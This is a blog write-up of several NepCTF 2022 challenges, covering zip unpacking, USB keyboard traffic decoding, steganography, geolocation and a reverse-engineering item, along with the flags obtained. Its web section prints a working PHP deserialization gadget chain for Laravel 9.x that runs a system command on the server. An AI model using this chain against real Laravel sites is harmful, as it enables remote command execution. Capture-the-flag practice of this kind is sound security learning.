shenghuo2's Blog
shenghuo2's Blog

NEPCTF 2022 WP

shenghuo2 shenghuo2 收录于 Writeup
  约 1200 字 预计阅读 3 分钟 
警告
本文最后更新于 2023-02-01,文中内容可能已过时。

NepCTF 2022 wp

misc

花花画画画花花

Author: β-AS

花花画了一张图,你能看出来她画的是什么吗

(flag格式为NepCTF{})

解压得到一个osu!的谱面 人太菜打不过()

导入osu开个不会fail的模式读谱即可

image-20220716011920006

对着回放打的

签到题

Author: limu

极限套娃

flag格式为nepctf{}

换过压缩包之后就有思路了 解压缩包套娃 没有密码

参考贝塔师傅的脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

#coding=utf-8
import os
import zipfile

orginal_zip = "Untitled1.zip"
while True:
    tag = orginal_zip
    orginal_zip = zipfile.ZipFile(orginal_zip)
    print tag
    zipname = orginal_zip.namelist()[0]
    try:
    	
        orginal_zip.extract(zipname)
	print tag
    except:
        break
    if(len(tag)>5):
    os.system("rm "+tag)
    orginal_zip = zipname

解到最后得到1.zip

里面有一个显示加密的流量包 发现为伪加密 将deFlags从05改成00即可解压

image-20220716012426256

一个键盘流量

先把流量提出来

1

tshark -r keyboard.pcap -T fields -e usbhid.data >usb.txt

然后用这个脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}


nums = []
keys = open('usb.txt')
for line in keys:
    if len(line)!=17:
        continue
    nums.append(line[0:2]+line[4:6]) #取一、三字节
keys.close()
output = ""
for n in nums:
    if n[2:4] == "00" :
        continue

    if n[2:4] in normalKeys:
        if n[0:2]=="02":
            output += shiftKeys [n[2:4]]
        else :
            output += normalKeys [n[2:4]]
    else:
        output += '[unknown]'
print('output :n' + output)

image-20220716012844566

有点小问题 删一下重的字符就行

1

nepctf{welcome-to-nepctf-2nd}

少见的bbbbase

Author: β - AS

少见的bbbbase

这是第一次用jphide解出来题

stegdetect检测

image-20220716013131164

用jphs5解文件

image-20220716013200544

得到文件 打开为一串base58

1

KkYWdvCQcLYewSUUy5TtQc9AMa

解base58得到flag

1

flag{Real_qiandao~}

9点直播

Author: 花花~

各位同学,比赛已经开始将近十个小时啦,大家玩的如何呢?邀请大家9点来直播间聊聊天~ 请锁定https://b23.tv/bn0pPAR 这边小助手收到了大家想暴打出题人的反馈,今晚9点我们请到了变态的出题人们,在直播间和大家交流,放出我们的hint,帮助大家解题。 同时也会在直播间中抽幸运的小伙伴送出我们的周边礼品。

直播间得flag

image-20220716013822004

1

NepCTF{bad_woman_nb!}

馅饼?陷阱!

Author: Zuni

好兄弟中奖了,但是要先汇款。他去哪了?

NepCTF{银行官网网址}

第二张图里能看到车牌号是琼 可以知道为海南

搜索东北饺子城 海南

image-20220716151606049

image-20220716151625172

查看地图 可以使用全景地图看到相同风景

image-20220717105612465

image-20220717105626143

image-20220716151743262

搜索广大官网得到flag

1

flag{cebbank.com}

问卷

1

NepCTF{see_you_NepCTF_2023}

RE

快来签到

Author: emtanling

x86 linux

一个纯脑洞题

flag在Graph里

image-20220716013422575

1

NepCTF{welc0me_t0_nepctf}

web

Just Kidding

Author: H3h3QAQ

顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd,没想到…居然被坏蛋Sharun撅了

能扫出来几个目录和备份文件

image-20220717102846139

根据备份中Laravel版本9.20可以找到一个最新的洞Laravel 9.18反序列化命令执行

然后去搜hello能找到hello的文件位置 可以得到他的参为h3

image-20220717102957251

构造一条链子传到h3就行

链子

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

<?php

namespace Faker {
    class Generator {
        protected $providers = [];
        protected $formatters = [];
        function __construct() {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        public function __construct() {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart {
        private $headers = null;
    }

    class SMimePart extends AbstractPart {
        protected $_headers;
        public $h3rmesk1t;
        function __construct() {
            $this->_headers = ["dispatch"=>"system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}


namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($pop));
    echo base64_encode(str_replace("i:9999","R:2",$ser));
}
?>

1

NepCTF{2a815677-a04d-47eb-b1ba-acbbe1eaf247}

Challenger

Author: H3h3QAQ

顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了

更新于 2023-02-01 
CC BY-NC-SA 4.0
NEP
返回 | 主页
0%